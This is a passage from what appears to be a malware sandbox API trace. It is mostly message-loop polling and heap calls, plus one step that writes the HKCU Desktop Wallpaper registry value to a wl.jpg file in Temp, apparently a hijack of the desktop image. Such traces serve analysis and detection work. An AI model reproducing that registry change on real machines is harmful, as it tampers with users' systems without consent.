wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.048] Sleep (dwMilliseconds=0xa) [0292.064] timeGetTime () returned 0x4905b [0292.064] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.064] Sleep (dwMilliseconds=0xa) [0292.079] timeGetTime () returned 0x4906b [0292.079] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0292.079] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0292.079] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0292.079] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0292.079] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0292.080] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.080] Sleep (dwMilliseconds=0xa) [0292.095] timeGetTime () returned 0x4907b [0292.095] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.095] Sleep (dwMilliseconds=0xa) [0292.110] timeGetTime () returned 0x4908a [0292.110] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.110] Sleep (dwMilliseconds=0xa) [0292.126] timeGetTime () returned 0x4909a [0292.126] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.126] Sleep (dwMilliseconds=0xa) [0292.142] timeGetTime () returned 0x490a9 [0292.142] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.142] Sleep (dwMilliseconds=0xa) [0292.157] timeGetTime () returned 0x490b9 [0292.157] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.157] Sleep (dwMilliseconds=0xa) [0292.173] timeGetTime () returned 0x490c9 [0292.173] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.173] Sleep (dwMilliseconds=0xa) [0292.188] timeGetTime () returned 0x490d8 [0292.188] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.188] Sleep (dwMilliseconds=0xa) [0292.204] timeGetTime () returned 0x490e8 [0292.204] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.204] Sleep (dwMilliseconds=0xa) [0292.220] timeGetTime () returned 0x490f7 [0292.220] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.220] Sleep (dwMilliseconds=0xa) [0292.235] timeGetTime () returned 0x49107 [0292.235] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.235] Sleep (dwMilliseconds=0xa) [0292.251] timeGetTime () returned 0x49117 [0292.251] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.251] Sleep (dwMilliseconds=0xa) [0292.266] timeGetTime () returned 0x49126 [0292.266] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.266] Sleep (dwMilliseconds=0xa) [0292.282] timeGetTime () returned 0x49136 [0292.282] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.282] Sleep (dwMilliseconds=0xa) [0292.298] timeGetTime () returned 0x49145 [0292.298] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.298] Sleep (dwMilliseconds=0xa) [0292.313] timeGetTime () returned 0x49155 [0292.313] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.313] Sleep (dwMilliseconds=0xa) [0292.329] timeGetTime () returned 0x49165 [0292.329] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.329] Sleep (dwMilliseconds=0xa) [0292.344] timeGetTime () returned 0x49174 [0292.345] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.345] Sleep (dwMilliseconds=0xa) [0292.360] timeGetTime () returned 0x49184 [0292.360] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.360] Sleep (dwMilliseconds=0xa) [0292.376] timeGetTime () returned 0x49193 [0292.376] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.376] Sleep (dwMilliseconds=0xa) [0292.391] timeGetTime () returned 0x491a3 [0292.391] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.391] Sleep (dwMilliseconds=0xa) [0292.407] timeGetTime () returned 0x491b3 [0292.407] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.407] Sleep (dwMilliseconds=0xa) [0292.423] timeGetTime () returned 0x491c2 [0292.424] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.424] Sleep (dwMilliseconds=0xa) [0292.438] timeGetTime () returned 0x491d2 [0292.438] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.438] Sleep (dwMilliseconds=0xa) [0292.454] timeGetTime () returned 0x491e1 [0292.454] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.454] Sleep (dwMilliseconds=0xa) [0292.469] timeGetTime () returned 0x491f1 [0292.469] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.469] Sleep (dwMilliseconds=0xa) [0292.485] timeGetTime () returned 0x49201 [0292.485] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.485] Sleep (dwMilliseconds=0xa) [0292.500] timeGetTime () returned 0x49210 [0292.500] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.500] Sleep (dwMilliseconds=0xa) [0292.516] timeGetTime () returned 0x49220 [0292.516] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.516] Sleep (dwMilliseconds=0xa) [0292.532] timeGetTime () returned 0x4922f [0292.532] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.532] Sleep (dwMilliseconds=0xa) [0292.547] timeGetTime () returned 0x4923f [0292.547] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.547] Sleep (dwMilliseconds=0xa) [0292.563] timeGetTime () returned 0x4924f [0292.563] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.563] Sleep (dwMilliseconds=0xa) [0292.578] timeGetTime () returned 0x4925e [0292.578] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.578] Sleep (dwMilliseconds=0xa) [0292.594] timeGetTime () returned 0x4926e [0292.594] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0292.594] Sleep (dwMilliseconds=0xa) [0292.610] timeGetTime () returned 0x4927d [0292.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0292.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0292.610] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0292.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0292.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0292.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0292.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0292.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0292.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0292.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0292.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0292.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0292.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0292.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0292.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0292.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0292.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0292.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0292.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0292.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0292.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0292.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0292.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0292.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0292.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0292.611] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0292.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0292.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0292.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0292.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0292.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0292.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0292.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0292.611] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0292.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0292.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0292.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0292.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0292.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0292.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0292.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0292.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0292.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0292.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0292.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0292.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0292.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0292.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0292.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0292.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0292.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0292.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0292.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0292.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0292.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0292.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0292.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0292.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0292.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0292.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0292.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0292.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0292.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0292.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0292.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0292.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0292.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0292.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0292.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0292.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0292.613] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0292.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0292.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0292.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0292.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0292.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0292.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0292.613] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0292.613] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0292.613] RegCloseKey (hKey=0x294) returned 0x0 [0292.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0292.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0292.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0292.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0292.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0292.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0292.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0292.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0292.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0292.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0292.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0292.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0292.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0292.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0292.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0292.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0292.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0292.614] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0292.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0292.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0292.614] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0292.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0292.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0292.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0292.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0292.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0292.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0292.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0292.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0292.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0292.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0292.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0292.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0292.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0292.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0292.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0292.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0292.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0292.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0292.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0292.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0292.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0292.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0292.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0292.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0292.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0292.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0292.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0292.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0292.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0292.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0292.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0292.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0292.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0292.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0292.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0292.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0292.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0292.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0292.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0292.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0292.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0292.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0292.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0292.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0292.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0292.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0292.616] HeapFree (in: 